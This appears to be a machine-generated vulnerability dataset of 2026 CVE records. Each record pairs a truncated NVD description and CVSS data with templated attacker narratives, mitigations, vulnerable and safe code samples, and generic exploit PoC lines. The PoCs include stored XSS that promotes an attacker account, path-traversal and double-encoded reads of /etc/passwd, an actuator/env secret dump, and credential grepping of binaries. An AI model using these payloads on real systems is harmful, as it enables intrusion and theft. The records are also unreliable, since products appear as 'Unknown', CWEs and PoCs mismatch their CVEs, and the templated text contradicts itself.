2026-03-28T06:16:00.137
5.4
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CWE-862
Unknown
Unknown
No identity verification occurs before executing critical operations. In Unknown up to Unknown, the flaw is present. The API returns data without checking the caller's permissions. CVE details: The Restaurant Cafeteria WordPress theme through 0.4.6 exposes insecure admin-ajax actions without nonce or capability checks,...
Permission logic is implicit, based only on obscurity. Impact: modifying global configurations affecting all tenants. The damage scale depends on the affected process's privileges. CVSS 5.4 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N.
The attacker probes for the specific vulnerable Unknown version using fingerprinting. The attacker uses GraphQL introspection for mutations without restrictions. The objective is data theft, persistence, or lateral pivoting. The vendor confirmed that Unknown Unknown contains the defect.
Use OPA (Open Policy Agent) for centralized declarative policies. Verify the fix did not break critical functionality in staging. Monitor performance metrics after applying the patch. Adopt bug-bounty programs for continuous flaw discovery. The fix must be validated specifically for Unknown versions Unknown. Schedule t...
# Example: IDOR in resource access (Unknown) # VULNERABLE: does not verify resource ownership @app.route('/api/orders/<int:order_id>') def get_order(order_id): return jsonify(Order.query.get(order_id).to_dict()) # Changing the order_id allows access to orders belonging to other users. # SAFE: scope query by owner ...
# Exploit PoC: API method override bypassing auth (Unknown) # Payload: POST /api/users/123 → change method to GET (auth not checked on GET) # Request: curl -X GET -H "Authorization: Bearer $USER_TOKEN" https://target.com/api/users/123 # Expected: Auth middleware only applied to POST/PUT; GET returns user 123 data witho...
CVE-2026-1307
2026-03-28T07:15:55.950
6.5
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-200
Unknown
Unknown
Debug information is inadvertently exposed to end users. In Unknown up to Unknown, the flaw is present. This is an Information Disclosure vulnerability. CVE details: The Ninja Forms - The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to,...
Database errors reveal schemas, table names, and column types. Impact: internal architecture and service mapping via error messages. Effective mitigation requires upgrading to an unaffected version. CVSS 6.5 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N.
The attacker uses search engines (Google Dorks, Shodan) to find exposed instances. The attacker measures response time to enumerate valid users. The goal is to maintain persistent access without detection. The typical environment involves Unknown up to Unknown.
Centralize logs in SIEM with PII masking. Test the fix in a staging environment that mirrors production. Assess the fix's impact on upstream and downstream dependencies. Adopt continuous vulnerability scanning in the CI/CD pipeline. The fix must be validated specifically for Unknown versions Unknown. Schedule the patch...
# Example: API leaks internal IDs (Unknown) # VULNERABLE: sequential IDs in API responses GET /api/users -> [{ "id": 1, "name": "Alice" }, { "id": 2, "name": "Bob" }] # Sequential IDs enable enumeration of all users by incrementing the ID. # SAFE: use UUIDs as public identifiers GET /api/users -> [{ "id": "a1b2c3d4", ...
# Exploit PoC: Environment variable disclosure via /actuator/env (Unknown) # Payload: GET /actuator/env # Request: curl -s https://target.com/actuator/env | jq . # Expected: JSON response containing all environment variables: DATABASE_URL, AWS_SECRET_ACCESS_KEY, JWT_SECRET, SMTP_PASSWORD. # Detection: Unauthenticated a...
CVE-2026-23399
2026-03-28T08:15:56.720
5.5
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CWE-401
linux_kernel
*, 5.11, 7.0
Exposure depends on deployment, configuration, and affected version. Confirmed in linux_kernel with builds *, 5.11, 7.0. This defect affects confidentiality, integrity, or availability. The published analysis states: In the Linux kernel, the following vulnerability has been resolved: nf_tables: nft_dynset: fix possibl...
The flaw may be emergent behavior from multiple configuration factors. Impact: potential compromise of confidentiality, integrity, or availability. The vulnerability was introduced in a recent release of linux_kernel. CVSS 5.5 (medium). Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.
The attacker uses social engineering to gain access to staging or demo environments. The attacker uses scanners (Nessus, nuclei) to detect the vulnerable version. The attacker seeks privilege escalation or remote execution. The target runs unpatched linux_kernel (versions *, 5.11, 7.0).
Implement a WAF or firewall as a temporary compensating control. Consider segmenting the network to limit lateral propagation if re-exploited. Monitor performance metrics after applying the patch. Train the development team on this vulnerability category. The fix must be validated specifically for linux_kernel versions...
// Example: Unsafe deserialization in linux_kernel (*, 5.11, 7.0) // VULNERABLE: parsing attacker-controlled serialized data obj = parse_binary_format(request.data) // Malformed or oversized input causes crashes or memory corruption. // SAFE: validate structure before and during parsing header = parse_header(request.d...
// Exploit PoC: Generic input validation bypass (linux_kernel) // Payload: Craft input outside expected range (type, size, format, encoding) // Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer // Expected: Application enters unexpected state; crash, information leak, or logic bypass depe...
CVE-2026-2442
2026-03-28T10:16:30.980
5.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CWE-93
Unknown
Unknown
Exposure depends on deployment, configuration, and affected version. The vulnerable product is Unknown (versions Unknown). A security advisory has been published detailing the impact scope. The CVE record explains: The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Imprope...
Review of the vendor advisory is required for precise root cause details. Impact: varies by specific vector and deployment environment. Exploitation requires valid low-privilege credentials. CVSS 5.3 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker combines OSINT to find exposed targets. The attacker intends to establish a foothold for a longer-term campaign. The target runs unpatched Unknown (versions Unknown).
Implement a WAF or firewall as a temporary compensating control. Configure automated alerts for new instances of the component. Revoke any potentially compromised credentials. Implement SAST and DAST in the build and deployment pipeline. The fix must be validated specifically for Unknown versions Unknown. Schedule the ...
# Example: Insecure default configuration in Unknown (Unknown) # VULNERABLE: debug mode and auth disabled by default DEBUG = True REQUIRE_AUTH = False # Debug mode and disabled authentication expose information and access. # SAFE: environment-driven secure defaults DEBUG = os.getenv('ENV', 'production') == 'developmen...
# Exploit PoC: Generic input validation bypass (Unknown) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depending on ...
CVE-2026-4993
2026-03-28T10:16:31.853
3.3
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE-259
Unknown
Unknown
The exact vector requires reviewing advisories and patch diffs. The vulnerability impacts Unknown versions Unknown. This defect affects confidentiality, integrity, or availability. The NVD entry notes: A vulnerability has been found in wandb OpenUI up to 0.0.0.0/1.0. This impacts an unknown function of the file backend...
Full technical details require reverse engineering the exploit. Impact: requires incident response and regulator notification. The attack surface includes the default service port of Unknown. CVSS 3.3 (low). Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N.
The attacker monitors underground forums for variants and bypasses. The attacker uses the Metasploit framework to automate the exploit. The goal is to maintain persistent access without detection. The attack is validated on Unknown with builds Unknown.
Consult vendor advisories for specific mitigation details. Establish a secure communication channel for incident reporting. Monitor performance metrics after applying the patch. Update the incident response playbook with this vulnerability type. The fix must be validated specifically for Unknown versions Unknown. Sched...
# Example: Missing rate limiting in Unknown (Unknown) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE...
# Exploit PoC: Generic input validation bypass (Unknown) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depending on ...
CVE-2026-4994
2026-03-28T10:16:32.110
3.5
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE-200
Unknown
Unknown
This is an Information Disclosure vulnerability. The vulnerability impacts Unknown versions Unknown. The amount of revealed information exceeds what is needed for operation. CVE details: A vulnerability was found in wandb OpenUI up to 1.0/3.5-turb. Affected is the function generic_exception_handler of the file backend/...
Database errors reveal schemas, table names, and column types. Impact: internal architecture and service mapping via error messages. Attack complexity is high: race conditions or multi-step chains. CVSS 3.5 (low). Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker inspects API responses for leaked internal identifiers. The goal is to maintain persistent access without detection. Exploitation occurs against Unknown (Unknown).
Use rate limiting on endpoints that could leak information. Implement defense in depth: WAF, IDS, EDR, and network segmentation. Establish patching SLAs based on CVE severity. Apply the principle of least privilege to all service accounts. The fix must be validated specifically for Unknown versions Unknown. Schedule th...
# Example: Stack trace in production (Unknown) # VULNERABLE: returns full exception details to client try {{ risky_operation(); }} catch (Exception e) {{ return JsonResponse({{"error": str(e), "traceback": traceback.format_exc()}}); }} # The trace reveals file paths, framework versions, and internal logic. # S...
# Exploit PoC: Environment variable disclosure via /actuator/env (Unknown) # Payload: GET /actuator/env # Request: curl -s https://target.com/actuator/env | jq . # Expected: JSON response containing all environment variables: DATABASE_URL, AWS_SECRET_ACCESS_KEY, JWT_SECRET, SMTP_PASSWORD. # Detection: Unauthenticated a...
CVE-2025-9497
2026-03-28T11:16:35.337
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-798
Unknown
Unknown
This is a Hard-coded Credentials vulnerability. The vulnerable product is Unknown (versions Unknown). The compilation or build includes production credentials in the binary. Impact documentation: Use of Hard-coded Credentials vulnerability in Microchip Time Provider 4100 allows Malicious Manual Software Update.This iss...
Symmetric keys appear in .properties, .env, or .xml files. Impact: attacker persistence via static-credential backdoor. The attack is easily automatable via scripts or frameworks. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews changelogs and patch diffs to understand the fix. The attacker analyzes a memory dump to find sensitive strings. The attacker seeks customer data for extortion or sale. Affected versions: Unknown Unknown.
Never compile credentials into binaries or Docker images. Document the flaw and fix in the team's knowledge base. Implement defense in depth: WAF, IDS, EDR, and network segmentation. Consider segmenting the network to limit lateral propagation if re-exploited. The fix must be validated specifically for Unknown versions...
# Example: Hard-coded JWT secret (Unknown) # VULNERABLE: symmetric key in source const JWT_SECRET = 'my-static-secret-key'; const token = jwt.sign({{ userId: 123 }}, JWT_SECRET); # Anyone with access to the source can forge valid tokens. # SAFE: load secret from environment const JWT_SECRET = process.env.JWT_SECRET; i...
# Exploit PoC: Binary strings dump for credentials (Unknown) # Payload: strings -n 8 binary | grep -E '(password|secret|api_key|jdbc:|mongodb://)' # Request: Download firmware/binary from vendor site → strings -n 8 firmware.bin | grep -iE 'password|secret|key|token' # Expected: Hard-coded database connection strings, A...
CVE-2026-4995
2026-03-28T11:16:36.060
3.5
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CWE-79
Unknown
Unknown
The application trusts external data when constructing the document object model. Published advisory affects Unknown up to version Unknown. This is an HTML/JavaScript injection flaw enabling attacker-controlled scripts. Per the NVD: A vulnerability was determined in wandb OpenUI up to 1.0. Affected by this vulnerabilit...
The rendering pipeline lacks output encoding for the specific HTML context. Impact: forced redirection to attacker-controlled phishing sites. Attack complexity is low: a public or trivial exploit exists. CVSS 3.5 (low). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N.
The attacker reviews changelogs and patch diffs to understand the fix. The attacker exploits DOM Clobbering to modify security variables. The direct impact is service disruption or data destruction. The flaw persists in Unknown up to version Unknown.
Add X-XSS-Protection and Strict-Transport-Security headers. Perform annual penetration testing and after significant architectural changes. Update the incident response playbook with this vulnerability type. Maintain a log of all post-patch exceptions and errors. The fix must be validated specifically for Unknown versi...
# Example: Reflected XSS (Unknown) # VULNERABLE: echoes input without escaping output = request.args.get('name') return "<h1>Hello, " + output + "</h1>" # If name contains <script>alert(1)</script>, it executes in the browser. # SAFE: contextual output encoding from markupsafe import escape output = request.args.get('...
# Exploit PoC: Stored XSS via comment field (Unknown) # Payload: <img src=x onerror="fetch('/admin/promote?user=attacker',{{method:'POST',credentials:'include'}})"> # Request: POST /comment HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | body=<img src=x onerror=...> # Expected: Every visitor to the page tr...
CVE-2016-20037
2026-03-28T12:15:58.500
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
This CVE documents an uncategorized security vulnerability. The vulnerable product is Unknown (versions Unknown). There is a confirmed vulnerability reported by the vendor or community. Per the NVD: xwpe 1.5.30a-2.1 and prior contains a stack-based buffer overflow vulnerability that allows local attackers to execute ar...
The vulnerability stems from a combination of design and implementation issues. Impact: the patch diff and advisories provide precise scope. The damage scale depends on the affected process's privileges. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker researches the vulnerability and develops a working proof of concept. The attacker intends to establish a foothold for a longer-term campaign. The attack surface is present in Unknown deployments at version Unknown.
Follow the vendor's remediation guidance in the security advisory. Implement SAST and DAST in the build and deployment pipeline. Establish patching SLAs based on CVE severity. Configure SIEM with specific rules for this attack category. The fix must be validated specifically for Unknown versions Unknown. Given the high...
# Example: Race condition in Unknown (Unknown) # VULNERABLE: check-then-act without synchronization if balance >= amount: balance -= amount transfer(amount) # Two concurrent requests can both pass the check and double-spend. # SAFE: atomic operation with locking with lock: if balance >= amount: bal...
# Exploit PoC: Race condition exploitation (Unknown) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; doub...
CVE-2016-20038
2026-03-28T12:15:59.277
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
This is a security flaw cataloged in the NVD. The vulnerability impacts Unknown versions Unknown. Exposure depends on deployment, configuration, and affected version. Impact documentation: yTree 1.94-1.1 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supply...
The defect was cataloged from observed behavior or a patch diff. Impact: the patch diff and advisories provide precise scope. The exploitation vector is remote (CVSS Attack Vector Network). CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker analyzes source code or firmware to find the entry point. The attacker targets systems running the vulnerable software version identified in the advisory. The objective is to degrade the target's reputation or operations. The target runs unpatched Unknown (versions Unknown).
Apply defense-in-depth measures while the permanent fix is being tested. Audit user permissions and roles after applying the patch. Implement SAST and DAST in the build and deployment pipeline. Conduct security-focused code reviews for all new code. The fix must be validated specifically for Unknown versions Unknown. G...
# Example: Insecure default configuration in Unknown (Unknown) # VULNERABLE: debug mode and auth disabled by default DEBUG = True REQUIRE_AUTH = False # Debug mode and disabled authentication expose information and access. # SAFE: environment-driven secure defaults DEBUG = os.getenv('ENV', 'production') == 'developmen...
# Exploit PoC: Generic input validation bypass (Unknown) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depending on ...
CVE-2016-20039
2026-03-28T12:15:59.473
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
The flaw was identified through patch analysis or anomalous behavior. The Unknown component at versions Unknown exhibits this defect. A security advisory has been published detailing the impact scope. The official description indicates: Multi Emulator Super System 0.154-3.1 contains a buffer overflow vulnerability in t...
Preconditions and the exact vector vary by deployment and configuration. Impact: scale depends on service exposure to the Internet or intranet. Exploitation requires valid low-privilege credentials. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker uses scanners (Nessus, nuclei) to detect the vulnerable version. The attacker aims to exfiltrate sensitive information. The PoC works against default installations of Unknown Unknown.
Apply the vendor's official patch as soon as it is available. Use container image scanning to detect vulnerable components in builds. Run automated regression tests against the patched component. Review access logs for signs of exploitation prior to the fix. The fix must be validated specifically for Unknown versions U...
# Example: Missing rate limiting in Unknown (Unknown) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE...
# Exploit PoC: Memory exhaustion via unbounded allocation (Unknown) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer terminates ...
CVE-2016-20040
2026-03-28T12:15:59.670
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-22
Unknown
Unknown
This is a Directory Traversal vulnerability. Versions Unknown of Unknown contain this flaw. There is an arbitrary filesystem navigation flaw. The security report mentions: TiEmu 3.03-nogdb+dfsg-3 contains a buffer overflow vulnerability in the ROM parameter handling that allows local attackers to crash the application ...
A file-serving endpoint trusts the user to provide a safe relative path. Impact: unauthorized access to any file readable by the process. The presence of ASLR, NX, and stack canaries partially mitigates the issue. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker uses NTFS alternate data streams to hide a webshell. The attacker aims to obtain credentials for future access. The target runs unpatched Unknown (versions Unknown).
Never trust user-supplied path components without resolution and prefix checks. Update dependencies and frameworks to non-vulnerable versions. Monitor underground forums and Exploit-DB for new variants. Establish a secure communication channel for incident reporting. The fix must be validated specifically for Unknown v...
# Example: Path traversal in download (Unknown) # VULNERABLE: path concatenated without validation filename = request.args.get('file') path = f"/var/www/files/{{filename}}" return send_file(path) # file = ../../../etc/passwd escapes the intended directory. # SAFE: resolve and verify prefix containment from pathlib imp...
# Exploit PoC: Path traversal reading /etc/passwd (Unknown) # Payload: ../../../../../../etc/passwd # Request: GET /download?file=../../../../../../etc/passwd HTTP/1.1 # Expected: Server returns contents of /etc/passwd; user enumeration enables targeted brute-force attacks. # Detection: ../ sequences in file parameters...
CVE-2016-20041
2026-03-28T12:15:59.860
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-22
Unknown
Unknown
This CVE documents a path canonicalization failure. The vulnerable product is Unknown (versions Unknown). User-supplied filenames are concatenated directly with the base directory. Impact documentation: Yasr 0.6.9-5 contains a buffer overflow vulnerability that allows local attackers to crash the application or execute...
The application opens files before verifying they reside under the allowed root. Impact: template or log overwrite for XSS or code execution. The attack surface includes the default service port of Unknown. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker uses PHP wrappers (php://filter) for source-code reading. The attacker seeks privilege escalation or remote execution. The vendor confirmed that Unknown Unknown contains the defect.
Implement upload scanning with ClamAV or YARA. Apply the principle of least privilege to all service accounts. Review access logs for signs of exploitation prior to the fix. Run automated regression tests against the patched component. The fix must be validated specifically for Unknown versions Unknown. Given the high ...
# Example: Node.js path traversal (Unknown) # VULNERABLE: directly joins user path const filePath = path.join('/var/www/files', req.query.file); res.sendFile(filePath); # file = ../../../etc/passwd reads system files. # SAFE: resolve and verify directory containment const base = path.resolve('/var/www/files'); const f...
# Exploit PoC: Double-encoded path traversal (Unknown) # Payload: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd # Request: GET /download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1 # Expected: URL decode → %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd → second decode by application...
CVE-2016-20042
2026-03-28T12:16:00.057
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
A security advisory has been published detailing the impact scope. The Unknown component at versions Unknown exhibits this defect. This is a security flaw cataloged in the NVD. The security report mentions: TRN 3.6-23 contains a stack buffer overflow vulnerability that allows local attackers to execute arbitrary code b...
The vulnerability involves interaction between multiple components. Impact: can be combined with other flaws for an exploit chain. Exploitation does not require prior authentication. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker reproduces the behavior in an isolated environment. The attacker seeks total control of the host or container. Exploitation occurs against Unknown (Unknown).
Consider isolating the component until a definitive fix is applied. Establish patching SLAs based on CVE severity. Apply the principle of least privilege to all service accounts. Enable file-integrity monitoring for critical system files. The fix must be validated specifically for Unknown versions Unknown. Given the hi...
# Example: Missing rate limiting in Unknown (Unknown) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE...
# Exploit PoC: Memory exhaustion via unbounded allocation (Unknown) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer terminates ...
CVE-2016-20043
2026-03-28T12:16:00.250
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
nrss
*
Exposure depends on deployment, configuration, and affected version. Versions * of nrss contain this flaw. The exact vector requires reviewing advisories and patch diffs. Impact documentation: NRSS RSS Reader 0.3.9-1 contains a stack buffer overflow vulnerability that allows local attackers to execute arbitrary code by...
The root cause depends on the specific vendor advisory analysis. Impact: may lead to partial or full system compromise under certain conditions. Effective mitigation requires upgrading to an unaffected version. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker scales the attack with mass Internet scans. The attacker aims to escalate into the internal network or cloud provider. The target runs unpatched nrss (versions *).
Conduct threat modeling to identify trust boundaries. Enable detailed logging to detect bypass attempts. Include the flaw in tabletop exercises and incident simulations. Revoke any potentially compromised credentials. The fix must be validated specifically for nrss versions *. Given the high severity, apply the patch I...
# Example: Missing rate limiting in nrss (*) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE: rate-li...
# Exploit PoC: Race condition exploitation (nrss) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; double-...
CVE-2016-20044
2026-03-28T12:16:00.447
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
pinfo
*
The flaw was identified through patch analysis or anomalous behavior. Confirmed in pinfo with builds *. The exact vector requires reviewing advisories and patch diffs. CVE details: PInfo 0.6.9-5.1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversi...
Preconditions and the exact vector vary by deployment and configuration. Impact: varies by specific vector and deployment environment. The exploit is reliable and requires no victim interaction. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker reproduces the behavior in an isolated environment. The direct impact is service disruption or data destruction. Affected versions: pinfo *.
Consider isolating the component until a definitive fix is applied. Use threat-intelligence feeds to anticipate zero-day exploits. Establish a secure communication channel for incident reporting. Revoke any potentially compromised credentials. The fix must be validated specifically for pinfo versions *. Given the high ...
# Example: Missing rate limiting in pinfo (*) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE: rate-l...
# Exploit PoC: Memory exhaustion via unbounded allocation (pinfo) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer terminates pr...
CVE-2016-20045
2026-03-28T12:16:00.630
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
hierarchical_notebook
*
This defect affects confidentiality, integrity, or availability. Observed in hierarchical_notebook (up to *). The system exhibits unsafe behavior under specific conditions. CVE details: HNB Organizer 1.9.18-10 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supply...
Full technical details require reverse engineering the exploit. Impact: potential compromise of confidentiality, integrity, or availability. The impact varies with the configuration of hierarchical_notebook. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker enumerates hierarchical_notebook versions via banners or headers. The attacker validates the exploit in a lab before a real attack. The attacker seeks customer data for extortion or sale. The flaw is exploitable in deployments of hierarchical_notebook (*).
Validate the fix in staging before deploying to production. Update the incident response playbook with this vulnerability type. Review access logs for signs of exploitation prior to the fix. Test the fix in a staging environment that mirrors production. The fix must be validated specifically for hierarchical_notebook v...
# Example: Missing rate limiting in hierarchical_notebook (*) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed....
# Exploit PoC: Race condition exploitation (hierarchical_notebook) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updat...
CVE-2016-20046
2026-03-28T12:16:00.827
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
The system exhibits unsafe behavior under specific conditions. The vulnerable product is Unknown (versions Unknown). This defect affects confidentiality, integrity, or availability. The official disclosure details: zFTP Client 20061220+dfsg3-4.1 contains a buffer overflow vulnerability in the NAME parameter handling of...
Preconditions and the exact vector vary by deployment and configuration. Impact: affects organizational reputation and regulatory compliance. The vulnerable component is Unknown (builds Unknown). CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker analyzes frontend JavaScript bundles to discover endpoints. The attacker analyzes the patch diff to understand the exact vector. The objective is to degrade the target's reputation or operations. The test environment replicates Unknown at version Unknown.
Implement a WAF or firewall as a temporary compensating control. Maintain an up-to-date inventory of all components and dependencies. Conduct security-focused code reviews for all new code. Ensure the patch is verified in an isolated environment before rollout. The fix must be validated specifically for Unknown version...
# Example: Generic security flaw in Unknown (Unknown) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not ...
# Exploit PoC: Race condition exploitation (Unknown) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; doub...
CVE-2016-20047
2026-03-28T12:16:01.013
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
There is a confirmed vulnerability reported by the vendor or community. Confirmed in Unknown with builds Unknown. The flaw was identified through patch analysis or anomalous behavior. The technical description states: EKG Gadu 1.9~pre+r2855-3+b1 contains a local buffer overflow vulnerability in the username handling th...
The defect was cataloged from observed behavior or a patch diff. Impact: requires PoC analysis for exact determination. Attack complexity is low: a public or trivial exploit exists. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker uses social engineering to gain access to staging or demo environments. The attacker combines OSINT to find exposed targets. The attacker aims to escalate into the internal network or cloud provider. The typical environment involves Unknown up to Unknown.
Prioritize fixes based on Internet exposure and CVSS score. Verify the fix did not break critical functionality in staging. Perform regression fuzzing to ensure the fix did not introduce new crashes. Run automated regression tests against the patched component. The fix must be validated specifically for Unknown version...
# Example: Generic security flaw in Unknown (Unknown) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not ...
# Exploit PoC: Generic input validation bypass (Unknown) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depending on ...
CVE-2016-20048
2026-03-28T12:16:01.210
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-22
Unknown
Unknown
This CVE documents a path canonicalization failure. Affects specifically Unknown at releases Unknown. User-supplied filenames are concatenated directly with the base directory. Advisory analysis reveals: iSelect 1.4.0-2+b1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary c...
Zip slip extracts files outside the target directory during decompression. Impact: escalation via reading session or cache files. The presence of ASLR, NX, and stack canaries partially mitigates the issue. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
